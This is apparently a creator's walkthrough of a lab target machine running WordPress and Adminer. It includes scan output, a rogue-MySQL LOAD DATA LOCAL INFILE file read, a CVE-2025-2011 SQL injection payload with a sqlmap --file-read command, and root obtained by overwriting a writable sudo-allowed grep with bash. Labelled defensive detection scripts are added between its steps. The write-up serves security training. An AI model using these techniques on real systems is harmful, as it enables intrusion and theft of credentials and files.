Initial Access#
└─# rustscan -a `IP` -- -sCV -Pn -n
Open 192.168.56.62:22
Open 192.168.56.62:80
Open 192.168.56.62:3306
Open 192.168.56.62:8000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -Pn -n" on ip 192.168.56.62
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 15:36 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Initiating ARP Ping Scan at 15:36
Scanning 192.168.56.62 [1 port]
Completed ARP Ping Scan at 15:36, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:36
Scanning 192.168.56.62 [4 ports]
Discovered open port 22/tcp on 192.168.56.62
Discovered open port 80/tcp on 192.168.56.62
Discovered open port 3306/tcp on 192.168.56.62
Discovered open port 8000/tcp on 192.168.56.62
Completed SYN Stealth Scan at 15:36, 0.03s elapsed (4 total ports)
Initiating Service scan at 15:36
Scanning 4 services on 192.168.56.62
Completed Service scan at 15:36, 12.46s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.56.62.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 2.60s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.13s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Nmap scan report for 192.168.56.62
Host is up, received arp-response (0.00074s latency).
Scanned at 2025-05-31 15:36:20 CST for 15s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
3306/tcp open mysql syn-ack ttl 64 MariaDB 10.3.23 or earlier (unauthorized)
8000/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.8.1
|_http-title: NeonGrid Solutions
MAC Address: 08:00:27:DD:A7:DA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.70 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)
Four ports are open: 22 (SSH), 80 and 8000 (web), and 3306 (MySQL).
Although port 3306 is open, attempts to connect to it fail; it is a "smoke screen".
80 - web#
Scanning with dirsearch finds two files:
/info.php
/adminer.php
A deeper scan with gobuster and a medium wordlist turns up another file:
/reminder.php
reminder.php#
This page gives us a username: jimmy
The image address in the middle of the webpage is: http://192.168.56.62/that-place-where-i-put-that-thing-that-time/1b260614-3aff-11f0-ac81-000c2921b441.jpg
Visiting this path points us to another credentials file at /etc/jimmy.txt.
In context, this jimmy.txt most likely holds the password of the jimmy user! So our main goal is to find a way to read this file.
Additionally, there seems to be an SQL injection at the bottom of the page.
However, when you try entering single quotes, it throws an error whether the count is odd or even, which is quite unusual: normally an odd number of single quotes causes an error while an even number does not. This is a rabbit hole I left.
That said, using SQL injection to read files is indeed a good idea; perhaps there are other, "real" injection points elsewhere?
adminer.php#
Next, let's take a look at /adminer.php.
Adminer is a lightweight database management tool that can connect to any database. This one is the latest version, however, and has no known vulnerabilities. Without database credentials we set it aside for now, since "a clever woman cannot cook without rice."
8000 - web#
Scanning port 8000 reveals a domain, wordpress.local, which we add to /etc/hosts and then visit.
It turns out to be the latest version of WordPress, unmodified.
One article provides a hint that corresponds to two exploitation paths.
mysqli.allow_local_infile = on is the interesting part: mysqli.allow_local_infile is a PHP setting that controls whether the mysqli client may load data from its local file system into the MySQL database with the LOAD DATA LOCAL INFILE statement. This means that if we can control the database connection, we can abuse this feature to read any file on the target machine and write it into our own database!
With a clear plan, we act immediately: set up a MySQL database on the Kali attack machine, then use Adminer to "hijack" the database connection and "ferry" files off the target.
First, edit the Kali MySQL configuration file /etc/mysql/mariadb.conf.d/50-server.cnf, changing bind-address = 127.0.0.1 to bind-address = 0.0.0.0 so our database accepts external connections, then start the service.
Next, connect to our Kali database from the Adminer interface and execute the following SQL:
-- Create a table to store data
CREATE TABLE exploit (
data TEXT
);
-- Use local infile syntax to load the target file
LOAD DATA LOCAL INFILE '/etc/jimmy.txt' INTO TABLE exploit
FIELDS TERMINATED BY "\n";
-- Query results
select * from exploit;
This retrieves the password HandsomeHU.
For a detailed exploitation process, you can refer to this article: https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f
Of course, here's a "spoiler": the latest version of Adminer does not allow this; it only worked here because I modified the source code to call $this->options(MYSQLI_OPT_LOCAL_INFILE,true)
The above is the standard solution. To lower the difficulty, I also left a backdoor: an SQL injection vulnerability in a WordPress plugin.
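As an added example (not code from the write-up or from Adminer), this detection logic parses server-to-client MySQL packets and flags the LOCAL INFILE request that an attacker-controlled database must send before a mysqli client uploads a file; the sample packets are constructed. Setting mysqli.allow_local_infile = Off, or simply running Adminer without the MYSQLI_OPT_LOCAL_INFILE modification described above, stops the client from honouring such a request in the first place.

```python
# Added example (not from the original write-up): spot a MySQL/MariaDB server
# answering a query with a LOCAL INFILE request, the packet an attacker-controlled
# database uses to make a PHP mysqli client hand over a file such as /etc/jimmy.txt.
# Wire format: 3-byte little-endian payload length, 1-byte sequence id, payload.
from typing import List, Optional

LOCAL_INFILE_MARKER = b"\xfb"  # first payload byte of a LOCAL INFILE request


def split_packets(stream: bytes) -> List[bytes]:
    """Split a raw server-to-client byte stream into packet payloads."""
    payloads = []
    pos = 0
    while pos + 4 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "little")
        payload = stream[pos + 4:pos + 4 + length]
        if len(payload) != length:
            raise ValueError("truncated packet at offset %d" % pos)
        payloads.append(payload)
        pos += 4 + length
    return payloads


def requested_local_file(response: bytes) -> Optional[str]:
    """Return the file the server asked the client to upload, or None.

    Only the first packet of a query response counts: a 0xFB byte inside a
    result set is just a NULL cell, not a file request.
    """
    packets = split_packets(response)
    if not packets or packets[0][:1] != LOCAL_INFILE_MARKER:
        return None
    return packets[0][1:].decode("utf-8", "replace")


def is_rogue_file_request(response: bytes, app_uses_load_data: bool = False) -> bool:
    """An app that never issues LOAD DATA LOCAL INFILE should never see one."""
    return requested_local_file(response) is not None and not app_uses_load_data


def build_packet(payload: bytes, seq: int) -> bytes:
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


# Constructed sample responses (not captured from the target machine).
OK_RESPONSE = build_packet(b"\x00\x00\x00\x02\x00\x00\x00", 1)
ROGUE_RESPONSE = build_packet(LOCAL_INFILE_MARKER + b"/etc/jimmy.txt", 1)
# A column-count packet followed by a 0xFB payload (how a NULL cell would look).
NULL_ROW_RESULT = build_packet(b"\x01", 1) + build_packet(LOCAL_INFILE_MARKER, 2)
```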
Using wpscan might be slow, but using nuclei yields results quickly and is still very useful:
nuclei -u http://wordpress.local:8000
I downloaded the CVE-2025-2011 PoC and tried it repeatedly, but it did not work; this PoC is broken.
└─$ python3 52285.py -u http://wordpress.local:8000
╔════════════════════════════════════════════════════════════════╗
║ CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder <3.6.2 ║
║ By datagoboom ║
╚════════════════════════════════════════════════════════════════╝
[*] Target URL: http://wordpress.local:8000
[+] Successfully connected to the target
[*] Checking if the target is vulnerable...
[-] Target does not appear to be vulnerable
[*] Try checking manually in your browser:
http://wordpress.local:8000/wp-admin/admin-ajax.php?s=test%' AND EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index
[-] Exiting as target does not appear to be vulnerable
Analyzing the vulnerability shows the injection point is the s parameter: admin-ajax.php?s=test*&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index
So sqlmap is used.
Here, I didn't intend for you to get a shell; the SQL injection only needs to be exploited to read files.
sqlmap -u 'http://wordpress.local:8000/wp-admin/admin-ajax.php?s=t*&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index' --batch --file-read=/etc/jimmy.txt
So, all roads lead to Rome. Of course, if you can read the wp-config file, obtain the database password, and then connect to the database via Adminer to change the WordPress admin password and access the backend, that is also a straightforward path. :)
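As an added example that is not part of the write-up, this detector parses Apache combined-format access log lines (constructed here, not taken from the target) and flags requests to the depicter-lead-index action whose s parameter carries SQL metacharacters or keywords, which is the trail a sqlmap run like the one above leaves behind.

```python
# Added example (not from the original write-up): flag requests to the
# vulnerable Depicter endpoint whose search parameter carries SQL
# metacharacters, run over constructed Apache combined-format log lines.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# Heuristic: characters and keywords that have no place in a lead-search term.
SQLI_RE = re.compile(r'''['"();]|--|/\*|\b(?:AND|OR|UNION|SELECT|SLEEP|EXTRACTVALUE|UPDATEXML)\b''', re.I)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_depicter_sqli(line: str) -> bool:
    """True when the line hits depicter-lead-index with a suspicious 's' value."""
    rec = parse_line(line)
    if rec is None or "admin-ajax.php" not in rec["target"]:
        return False
    query = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    if query.get("action", [""])[0] != "depicter-lead-index":
        return False
    search = query.get("s", [""])[0]   # parse_qs already percent-decodes
    return SQLI_RE.search(search) is not None


def flag_sqli(lines: List[str]) -> List[str]:
    """Return the source IPs of lines that look like injection attempts."""
    return [parse_line(l)["ip"] for l in lines if is_depicter_sqli(l)]


# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '192.168.56.1 - - [31/May/2025:15:40:01 +0800] "GET /wp-admin/admin-ajax.php?s=jimmy&perpage=20&page=1&orderBy=source_id&order=DESC&action=depicter-lead-index HTTP/1.1" 200 512',
    '192.168.56.1 - - [31/May/2025:15:40:09 +0800] "GET /wp-admin/admin-ajax.php?s=t%27%20AND%20SLEEP(5)--%20&perpage=20&page=1&orderBy=source_id&order=DESC&action=depicter-lead-index HTTP/1.1" 200 512',
    '192.168.56.1 - - [31/May/2025:15:40:15 +0800] "GET /wp-admin/admin-ajax.php?action=heartbeat&s=%27 HTTP/1.1" 200 64',
    '192.168.56.1 - - [31/May/2025:15:40:20 +0800] "POST /wp-login.php HTTP/1.1" 302 0',
]
```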
Privilege Escalation#
jimmy#
SSH in as the jimmy user. You will find that the environment variables have been tampered with, so many commands cannot be run directly. This doesn't stump us: running commands by absolute path bypasses it. There are many solutions, such as exporting PATH yourself, deleting the modified line in .bashrc, or even deleting .bashrc entirely.
There are two local users: adminer and jimmy.
In the wp-config file, find the adminer user password, as well as the MySQL database password.
Interestingly, the WordPress adminer user and the system adminer user share the same password.
adminer#
The adminer user can run /usr/bin/grep with sudo without a password.
su adminer
adminer@Ximai:/var/www/wordpress$ sudo -l
Matching Defaults entries for adminer on Ximai:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User adminer may run the following commands on Ximai:
(ALL) NOPASSWD: /usr/bin/grep
adminer@Ximai:/var/www/wordpress$ sudo /usr/bin/grep ' ' /root/root.txt
sorry, you are restricted from using this command.try egrep instead.
This grep command has clearly been tampered with:
jimmy@Ximai:/var/www/wordpress$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:/snap/bin
jimmy@Ximai:/var/www/wordpress$ file /usr/bin/grep
/usr/bin/grep: ASCII text
jimmy@Ximai:/var/www/wordpress$ ls -l /usr/bin/grep
-rwxr-xrwx 1 root root 76 May 28 09:06 /usr/bin/grep
jimmy@Ximai:/var/www/wordpress$ cat /usr/bin/grep
echo 'sorry, you are restricted from using this command.try egrep instead.'
jimmy@Ximai:/var/www/wordpress$
Finding that it is writable makes this easy; just cp /bin/bash /usr/bin/grep to overwrite it.
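As an added example (not from the write-up), the audit below checks what a sudoers NOPASSWD rule actually points at: root ownership, group/world-writable bits, and whether the file is an ELF binary rather than a script, the three signs that gave /usr/bin/grep away here; the demo() paths are constructed temp files, not real system binaries.

```python
# Added example (not from the original write-up): audit the command paths a
# sudoers NOPASSWD rule allows, catching the trick used on this box where
# /usr/bin/grep had been replaced by a world-writable shell script.
import os
import stat
import tempfile
from typing import Dict, List

ELF_MAGIC = b"\x7fELF"


def audit_sudo_target(path: str) -> List[str]:
    """Return the reasons a sudo target is unsafe; an empty list means clean."""
    problems = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        problems.append("symlink")               # could be repointed later
        st = os.stat(path)
    if st.st_uid != 0:
        problems.append("not owned by root")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        problems.append("group/world writable")  # -rwxr-xrwx, as seen on the box
    with open(path, "rb") as fh:
        head = fh.read(4)
    if head != ELF_MAGIC:
        problems.append("not an ELF binary")     # the fake grep was ASCII text
    return problems


def audit_rules(rules: Dict[str, List[str]]) -> Dict[str, List[str]]:
    """rules maps user -> allowed command paths (as sudo -l lists them)."""
    report = {}
    for user, paths in rules.items():
        for path in paths:
            problems = audit_sudo_target(path)
            if problems:
                report["%s:%s" % (user, path)] = problems
    return report


def demo() -> Dict[str, List[str]]:
    """Audit a constructed set of targets in a temp dir (not real system files)."""
    tmp = tempfile.mkdtemp()
    fake_grep = os.path.join(tmp, "grep")        # mimics the tampered /usr/bin/grep
    with open(fake_grep, "w") as fh:
        fh.write("echo 'sorry, you are restricted from using this command.'\n")
    os.chmod(fake_grep, 0o777)
    real_tool = os.path.join(tmp, "tool")        # minimal ELF header stub
    with open(real_tool, "wb") as fh:
        fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)
    os.chmod(real_tool, 0o755)
    return audit_rules({"adminer": [fake_grep, real_tool]})
```

On a real host, feed audit_rules() the command paths from `sudo -l` output; any non-empty entry in the report deserves a look before the rule is trusted.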
Conclusion#
Overall, I find this target machine to be of easy to medium difficulty. The web portion has left two entry points related to databases/SQL, both of which are not difficult. Of course, there are indeed many redundant elements in the target machine, requiring careful enumeration and a bit of patience to "pan for gold."
The privilege escalation part is relatively simple, mainly testing attention to detail. That's about it; I hope the target machine I created can provide you with some insights, and I welcome everyone to share their thoughts in the comments!